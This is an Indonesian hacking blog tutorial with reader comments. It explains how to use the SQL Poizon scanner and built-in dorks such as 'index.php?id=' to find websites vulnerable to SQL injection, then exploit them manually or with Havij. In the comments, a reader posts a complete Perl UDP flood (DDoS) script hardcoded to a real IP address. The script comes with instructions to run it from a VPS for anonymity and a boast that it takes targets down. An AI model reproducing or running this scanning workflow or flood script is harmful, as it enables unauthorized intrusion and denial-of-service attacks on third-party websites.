Setelah kita mengetahui cara melakukan sql injection dengan havij, kali ini saya mau bahas tool yang gak kalah keren nih. Namanya adalah SQL Poizon, jadi fungsi dari tool ini adalah untuk menemukan celah dalam websiste dengan dork yang udah tersedia di dalam tool ini.Jadi pekerjaan kita mencari target bakal lebih cepat dengan menggunakan sql poizon.Β Untuk lebih jelasnya simak tutorial dibawah ini π
Step 1: Download SQL Poizon Software
Step 2:Β Buka Sql Poizon v1.1 – The Exploit Scanner.exe
Step 3: Seperti terlihat dalam gambar, di dalam tool ini sudah terdapat beberapa dork. Dalam contoh ini kita gunakan dork PHP , yaitu index.php?id=. Setelah memilih dork, kita klik scan untuk melihat hasil dari dork php tadi.
Step 4: Setelah kita menemukan target, kita bisa gunakan Sqli Crawler. Caranya kita tinggal klik kanan pada target kita pilih “Send to Sqli Crawler -> All”
Step 5: Pada tab Sqli Cralwer tab, kita tinggal klik Crawl untuk memastikan manakah website yang bisa kita hack dengan sql injection.
Step 6: Setelah ketemu target yang vuln, kita bisa klik export result untuk menyimpan daftar url yang vuln π
Nah kalo udah ketemu web yang vuln kan kita bisa langsung eksekusi, bisa kita hack lakukan SQL Injection secara manual atau bisa juga kita gunakan tool havij untuk SQLi. Oke deh sekian dulu tutorial kali ini, jangan lupa like fp Portal Hacker untuk mendapatkan update postingan terbaru π
MASIH BINGUNG APA FUNSI DAN MAKSUD DARI SQL POZION
intinya tool ini berfungsi mempermudah kita mencari vuln target utk sqli
gan koq ane buka sql poisonnya adada tulusan gini ya??? “the application failed to initialize properly (0xc0000135). click ok to terminate the application”
bagaimana cara menyembunyikan alamat IP?
udah sy post di blog ini, coba baca ini
scannya lama bgt gan ?
itu tergantung koneksi internet
Thanks Kk Saya Coba Dulu,, Do’in semoga sukses π
oke, selamat mencoba π
This is Interesting Article for me… Thanks u ! Thanks All Indonesian Hackers !
I’am So Proudly YOU !
hmmm lebih simple ya dari pada menggunakan google secara manual
gan, ada metode DDOS.. coba di pake ajaaa
gan, mau tanya ni kalo mencari celah berdasrkan alamat website giman??
soalnya saya liat di artikel ni pencarian celah berdasarkan dork bukan alamt website..
#!/usr/bin/perl START SCRIPT
print q{
};
use Socket;
use strict;
my ($ip) = “173.214.183.70”;
my ($port) = 0;
my ($size) = 0;
my ($time) = 0;
my ($iaddr,$endtime,$psize,$pport);
$iaddr = inet_aton(“$ip”) or die “Cannot resolve hostname $ip\n”;
$endtime = time() + ($time ? $time : 1000000);
socket(flood, PF_INET, SOCK_DGRAM, 17);
print “Flooding $ip ” . ($port ? $port : “random”) . ” port with ” .
($size ? “$size-byte” : “random size”) . ” packets” .
($time ? ” for $time seconds” : “”) . “\n”;
for (;time() <= $endtime;) {
$psize = $size ? $size : int(rand(1024-64)+64) ;
$pport = $port ? $port : int(rand(65500))+1;
send(flood, pack("a$psize","saf3e368wumu7repa4uxa2rucHaphubeGamu9R3373af8Us3eTHUgepRAfAS2c6CHAyegURepUbre94wRAwruS2uhU8UXasp7spasw7sw8h7wapr5spabekumu8ast8StRadusASacu6a6e5efrAzeWucH5cumuswaraca7hAbrewrecujetrafefadrawruW4ayAjU37sPUseBr4cRuPhacrUtrf0azrrQlLd1xdSjjtdwXfjyXArkExrVxVlulxssmr0u0lRscLAqjkZB43ajPRmAH4JQ6T1SOZPFmndbEi4IUOIuUmPCXI044f73uGIeJHs8lh36KpJausXqykL2idPx1j120Rra2DI1kmGgde5LI4TJMuQvrotBR3Fli0g1uwt74ALKfRzHYZJR0wkqNncUY178LcbTFtx5n7MF4zX3P4Z3mUVkAebkXqDv6EETKTNBes9kW2QBEBLeKcBH4cUAQ8Y30mdGozVRNJq3wtDMmgtzCibqXEEp3cZATTOMqIDxn3t5HYdspEofPneXpPTUE0TBN8oRAp4DjSlhfDAVmfNgbdSbTHWT7Y7gVi6kgrNXKCM64V4kOGvesVr0SZU3k83r6qAr3w4d26kurU9eBRa53cEtRaQaCHEvacu4PETRaf3yepHAk9FAgU2at8GEMEZAwUjaDesTufu2r3DaPhedR7quCru7reketc8atacAStuGeFruNuTHaWuspabr6drARa4r4cApRewuFRaD3qAXAsPeMAChudRUWxuq73R5dra8epre4tasp8craq677wru5asuq3tradede8rethuSwAfespastuduypUt2fudra5utanewrat83rucruyuje6aphuprUWawrawr4tha922HeSpU8acacu5hastuprecevasteberepagas6ejuje2heswugukerebrajeVeswerajAdagecah3phE9EsutaFrU6erathu2u6utraseCrEjehaChuphEchepeswutrezu86pret6afa"), 0, pack_sockaddr_in($pport, $iaddr));
print ("$ip:$pport packet size: $psize\n");
}
ddos perl π
install perl
jalankan dengan perl π
nb: sebaiknya gunakan dengan bijak, untuk keamanan gunakan vps, pengiriman data terantung bandiwth, terakhir nyoba, bandwith 20gb taret langsung down ^_^, jangan lupa ganti ip target π